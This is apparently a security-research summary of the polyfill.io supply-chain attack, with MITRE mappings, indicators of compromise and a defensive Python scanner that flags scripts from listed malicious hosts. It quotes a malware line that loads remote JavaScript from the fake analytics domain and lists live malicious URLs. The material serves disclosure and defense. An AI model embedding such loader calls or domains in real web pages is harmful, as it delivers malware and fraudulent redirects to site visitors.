Polyfill supply chain attack hits 100K+ sites

Researchers uncovered a supply chain-style attack that abused the polyfill.io CDN to deliver malware to mobile users across 100K+ sites. The operation involved domain purchases, dynamic JavaScript payloads, and anti-analysis techniques, prompting advisories to remove polyfill references and consider alternatives from Fastly or Cloudflare. #PolyfillIO #GoogieAnalytics #JSTOR #Intuit #WorldEconomicForum #bootcdn #staticfile #newcrbpc

Keypoints

  • The polyfill.js library is widely embedded via cdn.polyfill.io on over 100,000 sites, including JSTOR, Intuit, and the World Economic Forum.
  • In February, a Chinese company bought the domain and its GitHub account, and the domain began injecting malware into mobile devices through sites embedding cdn.polyfill.io.
  • The malicious payload redirects mobile users to a sports-betting site using a fake Google analytics domain (www.googie-anaiytics.com).
  • The polyfill code is dynamically generated based on HTTP headers, enabling multiple attack vectors and evasion techniques.
  • The malware includes protections against reverse engineering, activates only on certain mobile devices at specific hours, and delays execution when a web analytics service is detected.
  • Cloudflare and Namecheap took action to block or hold the domain; Google began blocking Google Ads for eCommerce sites using polyfill.io; advisories recommend removing polyfill references and using trusted alternatives.

MITRE Techniques

  • [T1195] Supply Chain – The attacker abused a legitimate CDN domain (cdn.polyfill.io) by buying the domain and injecting malware into mobile users via sites that embed it. “In February this year, a Chinese company bought the domain and the GitHub account. Since then, this domain was caught injecting malware on mobile devices via any site that embeds cdn.polyfill.io.”
  • [T1105] Ingress Tool Transfer – The malware loads external JavaScript resources to deliver its payload and perform redirection. “loadJS('https://www.googie-anaiytics.com/html/checkcachehw.js' … )”
  • [T1027] Obfuscated/Compressed Files and Information – The code includes specific protections against reverse engineering and delays execution to evade analysis. “The code has specific protection against reverse engineering, and only activates on specific mobile devices at specific hours. It also delays execution when a web analytics service is found, presumably to not end up in the stats.”

Indicators of Compromise

  • [URL] context – https://kuurza.com/redirect?from=bitget, https://www.googie-anaiytics.com/html/checkcachehw.js
  • [Domain] context – bootcdn.net, staticfile.net
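A defender-side check in the spirit of the advisory in the keypoints above: this is an added example, not code from the original post or from Sansec. It scans an HTML page for script tags that load from the hosts named on this page (cdn.polyfill.io, the fake analytics host, and the two IoC domains) and also flags any other third-party script served without a Subresource Integrity hash; the host list and the sample HTML are constructed from this page's indicators, and the SRI value in the sample is a placeholder.

```python
import re
from urllib.parse import urlparse

# Hosts named on this page: the hijacked CDN, the fake analytics host used for the
# redirect, and the two related domains listed under Indicators of Compromise.
FLAGGED_HOSTS = {"polyfill.io", "www.googie-anaiytics.com", "bootcdn.net", "staticfile.net"}

SCRIPT_TAG_RE = re.compile(r"<script\b([^>]*)>", re.IGNORECASE)
ATTR_RE = re.compile(r"""(\w+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+))""")

def parse_attrs(attr_text):
    """Turn the inside of a <script ...> tag into a {name: value} dict."""
    return {m.group(1).lower(): next(g for g in m.groups()[1:] if g is not None)
            for m in ATTR_RE.finditer(attr_text)}

def host_matches(host, flagged=FLAGGED_HOSTS):
    """True if host is a flagged domain or any subdomain of one (e.g. cdn.polyfill.io)."""
    host = host.lower()
    return any(host == f or host.endswith("." + f) for f in flagged)

def audit_html(html, flagged=FLAGGED_HOSTS):
    """Return (src, host, reason) for each risky external script tag, in page order.

    reason is 'flagged-host' for the domains above, or 'missing-integrity' for any
    other third-party script loaded without an SRI hash. SRI cannot protect a
    polyfill.io-style service: the response is generated per request from HTTP
    headers, so no single hash fits; remove it or switch to a trusted, pinned copy.
    """
    findings = []
    for m in SCRIPT_TAG_RE.finditer(html):
        attrs = parse_attrs(m.group(1))
        src = attrs.get("src")
        if not src:
            continue  # inline script, nothing external to audit
        url = "https:" + src if src.startswith("//") else src  # protocol-relative CDN URLs
        host = urlparse(url).hostname or ""
        if host_matches(host, flagged):
            findings.append((src, host, "flagged-host"))
        elif host and "integrity" not in attrs:
            findings.append((src, host, "missing-integrity"))
    return findings

# Constructed sample page (not a real site); the SRI hash is a placeholder.
SAMPLE_HTML = """<html><head>
<script src="https://cdn.polyfill.io/v3/polyfill.min.js"></script>
<script src="//cdn.staticfile.net/some/lib.js" async></script>
<script src="https://cdn.example.org/app.js" integrity="sha384-PLACEHOLDER" crossorigin="anonymous"></script>
<script src="https://cdn.example.org/other.js"></script>
<script>inline();</script>
</head></html>"""

if __name__ == "__main__":
    for src, host, reason in audit_html(SAMPLE_HTML):
        print(f"{reason:18} {host:28} {src}")
```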

Read more: https://sansec.io/research/polyfill-supply-chain-attack